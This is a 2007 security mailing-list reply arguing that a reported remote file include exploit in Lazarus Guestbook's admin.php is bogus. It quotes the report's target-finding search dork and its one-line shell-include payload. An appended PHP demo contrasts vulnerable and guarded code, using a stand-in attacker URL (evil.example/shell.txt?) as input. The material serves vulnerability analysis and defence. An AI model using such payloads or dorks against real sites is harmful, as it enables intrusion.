Open Source and information security mailing list archives
Date: Wed, 07 Mar 2007 19:23:46 -0600
From: Mailinglists Address <mailinglist@...resshosting.net>
To: c_r_ck@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: [Bogus] Lazarus Guestbook (admin.php) Remote File Include Exploit

c_r_ck@...mail.com wrote:
> # Lazarus Guestbook (admin.php) Remote File Include Exploit
> # D.Script: http://www.carbonize.co.uk
> # Dork: "Powered by Lazarus Guestbook from carbonize.co.uk"
> # Discovered by Crack_man
> # Homepage: http://www.b0rizq.biz
> # Greetz To: B0rizq & red_casper & Draknaz kaiba & broken_proxy and all friends
>
> # Exploit:
> # [VicTim]/[path]/admin.php?include_path=shell.txt?cmd  
>
> ===========================
>
>   
With the lack of version information in this report it is hard for me to
say if the version I downloaded was already a patched version, or if
(based on previous history of these types of posts) this is just another
bogus report where the reviewer didn't actually look at the code, and
just posted based on the fact that there was a variable used in an
include (require, include_once, require_once, fopen, etc...) call.

Looking at line 36 of the admin.php script, you can see the following:

if (isset($include_path))
{
   die("Hacking Attempt!");
}
 
$include_path = dirname(__FILE__);

So... either it is patched in the version I am looking at (unlikely) or
this is a bogus report (like god knows how many others).

Tom Walsh
Express Web Systems, Inc.
http://www.expresswebsystems.com/
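The guard Tom quotes only makes sense against PHP's old register_globals behaviour, where every request parameter became a global variable before the script's first line ran, so `?include_path=...` could pre-populate `$include_path`. The script below is an added example, not code from Lazarus Guestbook or from anyone in this thread. Because register_globals was removed in PHP 5.4, it uses `extract()` on a constructed request array to stand in for that behaviour, and it only builds the path that would have been passed to `include`, never calls `include` itself. The function names, the `config.php` target and the attacker URL are all assumptions made for the demonstration.

```php
<?php
// Added example: why "if (isset($include_path)) die()" before the assignment
// closes the register_globals attack the report assumed.
// extract() below is a stand-in for register_globals=On (removed in PHP 5.4);
// the request arrays are constructed for the demo, not captured traffic.

// The pattern the reporter assumed: the variable is trusted if it already exists.
function admin_vulnerable(array $request): string
{
    extract($request);                 // stand-in for register_globals: ?include_path=... becomes $include_path
    if (!isset($include_path)) {       // only falls back to the safe default when nothing was injected
        $include_path = __DIR__;
    }
    // What would be handed to include(): with a URL here and URL includes
    // enabled, the trailing "?" in the payload turns "/config.php" into a
    // query string on the attacker's server, so the attacker's file is fetched.
    return $include_path . '/config.php';
}

// The pattern actually found at admin.php line 36: a pre-existing variable
// is treated as evidence of tampering and the script stops before any include.
function admin_guarded(array $request): string
{
    extract($request);                 // same register_globals stand-in
    if (isset($include_path)) {
        throw new RuntimeException('Hacking Attempt!');
    }
    $include_path = __DIR__;           // assigned only after the check, so it is never attacker-controlled
    return $include_path . '/config.php';
}

// Constructed inputs: the report's payload shape, and a normal request.
$attack = ['include_path' => 'http://evil.example/shell.txt?'];   // hypothetical attacker host
$benign = ['page' => '2'];

foreach (['benign' => $benign, 'attack' => $attack] as $label => $request) {
    echo "[$label] vulnerable -> ", admin_vulnerable($request), PHP_EOL;
    try {
        echo "[$label] guarded    -> ", admin_guarded($request), PHP_EOL;
    } catch (RuntimeException $e) {
        echo "[$label] guarded    -> refused: ", $e->getMessage(), PHP_EOL;
    }
}
```

Run it with `php example.php`. For the benign request both variants resolve to the script's own directory; for the attack request the vulnerable variant returns a path rooted at the attacker's URL, while the guarded variant refuses because `$include_path` already existed when the check ran. The remaining caveat is the one Tom raises: without a version number in the report there is no way to tell whether the guard was present in the version the reporter looked at, and a guard of this shape is only needed while register_globals is on.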
